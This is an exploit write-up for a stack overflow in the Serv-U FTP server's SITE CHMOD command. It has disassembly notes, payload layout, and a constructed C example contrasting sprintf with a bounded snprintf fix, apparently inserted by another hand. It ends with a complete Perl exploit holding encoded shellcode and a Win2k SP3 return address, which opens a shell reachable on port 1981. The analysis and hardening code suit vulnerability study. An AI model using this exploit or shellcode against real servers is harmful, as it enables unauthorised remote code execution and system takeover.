Analysis of the Serv-U "site chmod" vulnerability
author: wujianqiang 18/2/2004 email: wujianqiangis@mail.china.com homepage: http://wujianqiang.533.net
Q: What do you do when you're bored? A: Play with exploits...
Actually this program isn't hard to debug; it's just that the shellcode requirements are a bit of a hassle ;)
When I started debugging I stepped through it command by command, which is laborious; it's faster to just let it run. Relationship: loc_4190E8 |_loc_41953d
sub_4190E8 proc near                 ; CODE XREF: sub_41824C+11Ep
.text:004190E8 buffer = byte ptr -1ECh   ; the buffer

loc_41953D:                          ; CODE XREF: sub_4190E8+441j
.text:0041953D push [ebp+var_8]      ; address of the user's input; the shellcode gets filtered, see below; the sprintf further down keeps using it, path included
.text:00419540 push 0FFFFFFFFh
.text:00419542 push 4B4h
.text:00419547 lea eax, [esi+8460h]
.text:0041954D push eax
.text:0041954E call sub_4143F0       ; didn't step into this one; it has no effect on the file name
.text:00419553 add esp, 0Ch          ; stack cleanup; note add esp,0xc: three arguments
.text:00419556 push eax              ; format
.text:00419557 lea edx, [ebp+buffer]
.text:0041955D push edx              ; buffer
.text:0041955E call _sprintf         ; an unsafe function, this is what causes the overflow
.text:00419563 add esp, 0Ch
.text:00419566 lea ecx, [ebp+buffer]
.text:0041956C push ecx
.text:0041956D push esi
.text:0041956E call sub_432AA8       ; no effect here
.text:00419573 add esp, 8
.text:00419576 dec [ebp+var_38]
.text:00419579 dec [ebp+var_38]
.text:0041957C cmp [ebp+var_8], 0
.text:00419580 jz loc_41960F         ; note: when overwriting, ebp+var_38 must not be 2, otherwise it branches away :)
.text:00419586 mov eax, [ebp+var_8]  ; var_8 has been overwritten
.text:00419589 mov edx, [eax-0Ch]    ; the exception happens here; fs:0 -> overwritten, see the debugger analysis below
.text:0041958C inc edx
A perfectly ordinary overflow, grandly described as "a format string leading to a plain stack overflow"; you could add an n or a %.xxs. Note that afterwards the buffer ends up with an extra 500 /. It's just that the shellcode is not easy to write: 1. First, ebp+var_38 must not be 2, otherwise it jumps away (I didn't trace that path). Also, because I traced from _loc_41953d, I had no control over the character conversion that happens earlier. Packet-capture tests showed: @1 \x5c "\" is converted to 0x2f "/"; @2 \x0a "\n" is dropped; @3 of \xff\xff\xff one byte is dropped, leaving \xff\xff, so I simply added another \xff\xff (I don't know why). So the generic shellcode has to be modified to satisfy these conditions; I prepended a decoder routine to eyas's code so that it does.
404 bytes of filler | jmp 0x38 nop nop | call ebx | "a"x50 | shellcode
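To make the defect in the disassembly concrete for anyone maintaining similar code, here is a constructed C example (not Serv-U's source, which is not on this page): the sprintf() pattern from loc_41955E next to a bounded replacement. The 0x1EC buffer size comes from the disassembly; the "%s/%s" format, the home-directory prefix and the function names are assumptions for illustration.

```c
#include <stdio.h>
#include <string.h>

/* Constructed example, not Serv-U's code. The disassembly at loc_41953D
 * shows a 0x1EC-byte stack buffer ([ebp+buffer]) filled by sprintf() with
 * a format that embeds the user's SITE CHMOD argument. */
#define PATH_BUF_SIZE 0x1EC

/* The pattern from the disassembly: sprintf() never learns how large buf
 * is, so an argument longer than what fits runs past the end of buf into
 * the saved locals (var_38, var_8), the saved EBP and the return address.
 * Only called here with a short argument. */
static void build_path_unsafe(char *buf, const char *home, const char *arg)
{
    sprintf(buf, "%s/%s", home, arg);   /* assumed format, for illustration */
}

/* Hardened form: snprintf() bounds the write and returns the length the
 * full string would have had, so truncation is detectable. A truncated
 * path is refused rather than silently used. Returns 0 on success, -1
 * when the argument does not fit. */
static int build_path_safe(char *buf, size_t bufsz, const char *home, const char *arg)
{
    int n = snprintf(buf, bufsz, "%s/%s", home, arg);
    if (n < 0 || (size_t)n >= bufsz) {
        buf[0] = '\0';
        return -1;
    }
    return 0;
}

/* The write-up's payload is "/" + 403 bytes of filler + jump + address +
 * 50 bytes + shellcode, i.e. well over 492 bytes. Feed an argument of that
 * order to the hardened builder; it must be rejected. */
int demo_overlong_rejected(void)
{
    char buf[PATH_BUF_SIZE];
    char arg[600];                       /* constructed overlong argument */
    memset(arg, 'a', sizeof arg - 1);
    arg[sizeof arg - 1] = '\0';
    return build_path_safe(buf, sizeof buf, "/home/ftp", arg);
}

/* A normal argument is accepted unchanged. */
int demo_short_ok(void)
{
    char buf[PATH_BUF_SIZE];
    return build_path_safe(buf, sizeof buf, "/home/ftp", "pub/file.txt");
}

/* Length of the path the hardened builder produces for the short case:
 * "/home/ftp" (9) + "/" (1) + "pub/file.txt" (12) = 22. */
size_t demo_short_len(void)
{
    char buf[PATH_BUF_SIZE];
    if (build_path_safe(buf, sizeof buf, "/home/ftp", "pub/file.txt") != 0)
        return 0;
    return strlen(buf);
}

int main(void)
{
    char buf[PATH_BUF_SIZE];
    build_path_unsafe(buf, "/home/ftp", "pub/file.txt");
    printf("unsafe, short arg   : %s\n", buf);
    printf("safe,   short arg   : %d\n", demo_short_ok());
    printf("safe,   600-byte arg: %d (rejected)\n", demo_overlong_rejected());
    return 0;
}
```

The point of the check on snprintf()'s return value is that bounding the write alone is not enough: a silently truncated path is still a logic bug, so the caller must learn that the argument was too long and refuse the command.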
An exploit written in Perl:
#perl.exe
#use call ebx as the ret
#tested on Win2k sp3 Serv-u 4.0
#by wujianqiang wujianqiangis@mail.china.com
#copyright 2004
use IO::Socket;

if ($#ARGV<2){print "usage: serv-u.pl IP <username> <passwd>\n";exit(1);}
$host = $ARGV[0];
$port = 21;
$user = $ARGV[1];
$pass = $ARGV[2];

# shellcode: decoder stub prepended to eyas's code (see above)
$sc= "\xEB\x1f\x5A\x57\x52\x5F\x4A\x33\xC9\xB1\x09\xFE\xC1\x83\xEF\x0B\x88".
"\x0F\x5F\x33\xC9\x66\xb9\x66\x01\x80\x34\xff\x99\xE2\xFA\xEB\x05\xE8".
"\xdc\xFF\xFF\xFF\xff\xff".
"\x70\x99\x98\x99\x99\xC3\x21\x95\x69\x64\xE6\x12\x99\x12\xE9\x85".
"\x34\x12\xD9\x91\x12\x41\x12\xEA\xA5\x9A\x6A\x12\xEF\xE1\x9A\x6A".
"\x12\xE7\xB9\x9A\x62\x12\xD7\x8D\xAA\x74\xCF\xCE\xC8\x12\xA6\x9A".
"\x62\x12\x6B\xF3\x97\xC0\x6A\x3F\xED\x91\xC0\xC6\x1A\x5E\x9D\xDC".
"\x7B\x70\xC0\xC6\xC7\x12\x54\x12\xDF\xBD\x9A\x5A\x48\x78\x9A\x58".
"\xAA\x50\xFF\x12\x91\x12\xDF\x85\x9A\x5A\x58\x78\x9B\x9A\x58\x12".
"\x99\x9A\x5A\x12\x63\x12\x6E\x1A\x5F\x97\x12\x49\xF3\x9A\xC0\x71".
"\xE5\x99\x99\x99\x1A\x5F\x94\xCB\xCF\x66\xCE\x65\xC3\x12\x41\xF3".
"\x9D\xC0\x71\xF0\x99\x99\x99\xC9\xC9\xC9\xC9\xF3\x98\xF3\x9B\x66".
"\xCE\x69\x12\x41\x5E\x9E\x9B\x99\x9E\x24\xAA\x59\x10\xDE\x9D\xF3".
"\x89\xCE\xCA\x66\xCE\x6D\xF3\x98\xCA\x66\xCE\x61\xC9\xC9\xCA\x66".
"\xCE\x65\x1A\x75\xDD\x12\x6D\xAA\x42\xF3\x89\xC0\x10\x85\x17\x7B".
"\x62\x10\xDF\xA1\x10\xDF\xA5\x10\xDF\xD9\x5E\xDF\xB5\x98\x98\x99".
"\x99\x14\xDE\x89\xC9\xCF\xCA\xCA\xCA\xF3\x98\xCA\xCA\x5E\xDE\xA5".
"\xFA\xF4\xFD\x99\x14\xDE\xA5\xC9\xCA\x66\xCE\x7D\xC9\x66\xCE\x71".
"\xAA\x59\x35\x1C\x59\xEC\x60\xC8\xCB\xCF\xCA\x66\x4B\xC3\xC0\x32".
"\x7B\x77\xAA\x59\x5A\x71\x62\x67\x66\x66\xDE\xFC\xED\xC9\xEB\xF6".
"\xFA\xD8\xFD\xFD\xEB\xFC\xEA\xEA\x99\xDA\xEB\xFC\xF8\xED\xFC\xC9".
"\xEB\xF6\xFA\xFC\xEA\xEA\xD8\x99\xDC\xE1\xF0\xED\xC9\xEB\xF6\xFA".
"\xFC\xEA\xEA\x99\xD5\xF6\xF8\xFD\xD5\xF0\xFB\xEB\xF8\xEB\xE0\xD8".
"\x99\xEE\xEA\xAB\xC6\xAA\xAB\x99\xCE\xCA\xD8\xCA\xF6\xFA\xF2\xFC".
"\xED\xD8\x99\xFB\xF0\xF7\xFD\x99\xF5\xF0\xEA\xED\xFC\xF7\x99\xF8".
"\xFA\xFA\xFC\xE9\xED\x99";

$pad="/";
$pad=$pad."a"x403;            #filler a...a
$jmpover="\xeb\x38\x90\x90";
$jmpover2="a"x50;
$callebx="\x7a\x36\xe6\x77";  #call ebx at kernel32 win2k sp3

$socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => "tcp", Type => SOCK_STREAM) or die "Couldn't connect: $!\n";
print $socket "user $user\r\n";
sleep(5);
print $socket "pass $pass\r\n";
sleep(5);
print $socket "site chmod 777 $pad$jmpover$callebx$jmpover2$sc \r\n";
print "you may try to telnet 1981 for a test\r\n";
print "exp by wujianqiang wujianqiangis@mail.china.com\r\n";
print "welcome to http://wujianqiang.533.net\r\n";
close($socket);